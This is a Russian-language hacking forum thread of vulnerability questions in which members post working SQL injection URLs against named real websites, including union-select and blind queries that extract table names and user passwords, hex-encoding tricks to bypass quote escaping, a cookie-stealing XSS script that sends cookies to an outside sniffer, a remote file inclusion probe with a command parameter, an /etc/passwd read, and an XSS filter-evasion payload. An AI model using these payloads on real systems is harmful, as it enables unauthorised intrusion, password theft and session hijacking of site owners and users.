Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    jecka3000 почитай статьи, любые
    http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables+where+table_schema=0x726F636974--

    wildshaman я же писал про набивание постов , а ты сказал, что ничего такого не будет.
     
  2. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Лично я не набиваю, (я не стремлюсь ни в РОА, ни в МОА, ни выше) а просто помогаю человеку.
    Теперь любая помощь в тематических разделах считается набиванием постов?
     
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    PHP:
    fwrite(fopen('query.txt','a+'),$_REQUEST['QUERY_STRING']."\r\n")
    Запись квери_стринг. Редирект примерно такой
    Code:
    <script>location="http://site.ru/snifffer.php?"+document.cookie</script>
     
    1 person likes this.
  4. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    jokester, я достиг такого же результаты с помощью LIMIT 28,1 -- Именн тут база мне ответила user

    зато на такой запрос http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from+information_schema.columns+where+table_name=%27user%27 жу ничего не выводит...
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    jecka3000
    Я- же написал, почитай любую статью. mailbrush тебе написал, включены маджики, тоеть кавычки экранируются.

    Переводи в хекс
    http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from+information_schema.columns+where+table_name=0x75736572

    Дружище, не нужно переиначивать. Сообщения не по теме - это набивание постов, а попросту оффтоп.

    Применительно к данному случаю:

    Человек делает выборку из конкретной базы, а ты ему даёшь запрос выборки из всех баз. Он и без тебя , думаю , с этим справлялся. Отсюда вывод: совет не в тему , стало-быть оффтоп.
     
    1 person likes this.
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from+information_schema.columns+where+table_name=0x75736572
    Юзай хекс, читай статьи. Тебе же линк дали!
     
    2 people like this.
  7. main()

    main() Banned

    Joined:
    10 Jun 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    1
    Спасибо огромное. поставте ктонить ему +
    Я новичок могу только 0
     
    1 person likes this.
  8. Fisher2003

    Fisher2003 Banned

    Joined:
    10 Jun 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Кто нибудь покажите где здесь уязвимость?

    Найдено: /?PageServices
    Найдено: /?wp-cs-dump
    Найдено: /?wp-html-rend
    Найдено: /?wp-stop-ver
    Найдено: /?wp-uncheckout
    Найдено: /?wp-usr-prop
    Найдено: /?wp-ver-diff
    Найдено: /?wp-verify-link
    Найдено: /?wp-ver-info
    Найдено: /index.php?IDAdmin=test
    Найдено: /index.php?base=test
    Найдено: /index.php?SqlQuery=test
    Найдено: index.php?tampon=test
    Найдено: /index.php?name=Members_List&letter=All&sortby=pass
    Найдено: /index.php?name=Members_List&letter=All&sortby=uid
    Найдено: /server-status/
    Найдено: /index.php?name=Web_Links&ratinglid=96&ratinguser=?&ratinghost_name=?&rating=99999999999999999999999
    Найдено: index.php?module=calendar&calendar[view]=month&month=11&year=9
    Найдено: /index.php?do=ext&page=http://bugdurito.narod.ru/cmd.php&cmd=id
    Найдено: /index.php?method=`
    Найдено: /index.php?a=lostpw&set=1&id=`
    Найдено: index.php?a=lostpw&set=1&session_id=`
    Найдено: /index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=
    Найдено: /index.php?method=`
    Найдено: /index.php?a=lostpw&set=1&id=`
    Найдено: /index.php?a=lostpw&set=1&session_id=`
    Найдено: /?page='
    Найдено: /?page=shop/cart&func=cartAdd&product_id='
    Найдено: /?page=shop/browse&category_id=&offset='
    Найдено: /?page=admin/index&GulfTech=">
    Найдено: /index.php?option=content&task=view&id='
    i vot eshe
    /cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
     
  9. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    а полный линк не хошь выложить?
     
  10. Fisher2003

    Fisher2003 Banned

    Joined:
    10 Jun 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Да пожайлуста

    ka4ni.ру

    Скажи и мне что там мона сделать особенно вот с этим
    /cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
     
  11. molotovkeyt

    molotovkeyt Member

    Joined:
    2 Nov 2008
    Messages:
    2
    Likes Received:
    8
    Reputations:
    -1
    ПР 6.
    Не расковырял.
    http://www.libyaonline.com/business/details.php?id=1'
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    isher2003, Да ничего, просто двиг, при нахождении некоторых символов орет - хакинг аттемпт (т.е. попытка взлома).
     
    #7592 mailbrush, 15 Jun 2009
    Last edited: 15 Jun 2009
  13. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.alertsite.com/phplive/image.php?l=image.php

    Так работает/будет работать или нет/не будет работать ? Ответа я так и не получил.Мне только выводит is_dir() функцию,как ты и писал.
     
  14. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Заурядная скуля

    http://www.libyaonline.com/business/details.php?id=9846+and+1=if(ascii(substring((select+user_password+from+users+limit+0,1),1,1))>1,1,0)

    Рядом есть с выводом

    http://www.libyaonline.com/music/artist.php?id=-64+union+select+1,user_password,3,4,5,6+from+users+limit+0,1--+


    Валемир, я думаю что нет
     
  15. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    привет. Возможно ли через xss баг произвести sql инъекцию, если да то как?
     
  16. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    20
    Likes Received:
    2
    Reputations:
    1
    Кто чем ищет логи (конфиги итд....) апача при LFI?
     
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Нет.

    http://forum.antichat.ru/thread49775.html
     
  18. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    нет vailbrush ты сильно ошибаешся, я уже где то подробное описание видел на английском которое выполняли на xss ке тоесть внутри xss sql запросы, но к сожалению забыл где нашел. Вот поэтому спросил может здесь в ачате уже знают.
    Вы еще скажите мне на запросе
    Code:
    1>"><ScRiPt%20%0a%0d>alert(401223179617)%3B</ScRiPt>
    вместо номера 401223179617 фильтруется символы, как обходит этого? Чем зашифроват запрос?
     
  19. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    ты не прав, XSS выполняется у тебя в браузере, а sql запросы идут к базе данных. Можно внутри sql инъекции заюзать xss, но не наоборот.
     
    1 person likes this.
  20. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    а понял значит я перепутал, спасибо
     
Thread Status:
Not open for further replies.